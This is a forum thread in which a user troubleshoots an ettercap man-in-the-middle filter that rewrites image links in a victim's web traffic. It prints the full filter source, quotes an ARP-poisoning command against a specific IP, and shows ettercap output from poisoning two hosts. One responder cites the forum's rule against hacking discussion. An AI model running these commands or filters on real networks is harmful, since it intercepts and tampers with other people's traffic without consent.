Linux - SoftwareThis forum is for Software issues.
Having a problem installing a new program? Want to know which application is best for the job? Post your question in this forum.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
I see that 'filter ran' several times is echoed.
Even if URL isn't https , still web page gets loaded slowly incompletely without changed image.
Why did target web browser 'google chrome Version 30.0.1566.2' drop the images I am trying to insert ?
I see that 'filter ran' several times is echoed. Even if URL isn't https , still web page gets loaded slowly incompletely without changed image.
Why did target web browser 'google chrome Version 30.0.1566.2' drop the images I am trying to insert ?
No idea, since you don't post information about what you did, other than that weblink. Some VERY obvious things:
The picture you referenced for the 'filter' doesn't exist/can't be read?
You're filtering http, NOT https?
You didn't read this part of the page you linked to?
Quote:
Originally Posted by Weblink
Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss
Apropos intentions - I can just say that ettercap tool is available freely and it is choice of any individual to believe or not what I say.
If used maliciously then consequences have to be bore by doer - that I am well aware of.
I read that
Quote:
Keep in mind that this filter does not seem to fire off for all images, it's a little hit and miss
Still , I was expecting to see changed image once on any web page (http://ibnlive.in.com/ in my case).
Have you tried it or do you intend to ?
If yes , then you can help me in solving this . Because , i have followed mentioned tutorial , step by step.
############################################################################
# #
# Jolly Pwned -- ig.filter -- filter source file #
# #
# By Irongeek. based on code from ALoR & NaGA #
# Along with some help from Kev and jon.dmml #
# http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
msg("Filter Ran.\n");
}
I conclude that
message 'filter ran' indicates that there is no problem of intervening attributes between img & src which may not cause pattern match , hence no replacement.
i am not aware , if there is some checksum associated which causes browser to disregard replaced packets as garbage.
Last edited by sumeet inani; 07-19-2013 at 05:46 AM.
Apropos intentions - I can just say that ettercap tool is available freely and it is choice of any individual to believe or not what I say. If used maliciously then consequences have to be bore by doer - that I am well aware of.
And we all are aware of that, but the LQ Rules specifically mention hacking/cracking, and the fact that such things aren't to be discussed. I am not saying we don't believe you, but that we have no way of KNOWING your intentions.
Quote:
I read that Still , I was expecting to see changed image once on any web page (http://ibnlive.in.com/ in my case). Have you tried it or do you intend to ? If yes , then you can help me in solving this . Because , i have followed mentioned tutorial , step by step.
############################################################################
# #
# Jolly Pwned -- ig.filter -- filter source file #
# #
# By Irongeek. based on code from ALoR & NaGA #
# Along with some help from Kev and jon.dmml #
# http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png");
msg("Filter Ran.\n");
}
I conclude that
message 'filter ran' indicates that there is no problem of intervening attributes between img & src which may not cause pattern match , hence no replacement. i am not aware , if there is some checksum associated which causes browser to disregard replaced packets as garbage.
Well, if you did follow the tutorial, you'll notice that you're missing the backslashes before the end of the img src lines, as they are in the tutorial. You'll also notice this part of the tutorial as well:
Quote:
Originally Posted by Ettercap Page
Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.22.47, we would use this command:
ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //
...which specifically addresses the speed issue you mentioned previously, since you're (apparently) specifying a large range of addresses in your command. Also, the command you typed in for your one workstation
please , pardon my unintended impertinence.
Seems , this is not appropriate place for discusssing this stuff.
Anyway I copied the code ditto from http://www.irongeek.com/i.php?page=s...ettercapfilter
the browsing on target computer was slow though
Code:
ettercap NG-0.7.4_git copyright 2001-2011 ALoR & NaGA
Content filters loaded from ig.ef...
Listening on p5p1... (Ethernet)
p5p1 -> 6C:3B:E5:20:B2:AD 192.168.8.103 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services
Scanning for merged targets (2 hosts)...
* |==================================================>| 100.00 %
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.8.184 00:1E:C9:3E:7D:92
GROUP 2 : 192.168.8.1 1C:E6:C7:52:00:C0
Starting Unified sniffing...
this shows that no other computer on LAN was targeted.
Still , I see source code of target web page mentioning redirected link at one of two img tags.
The one that did not got replaced had additional attributes to img tag other than src.
I have written mail to ettercap.project -at- gmail.com seeking docuentation on etterfilter rules.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.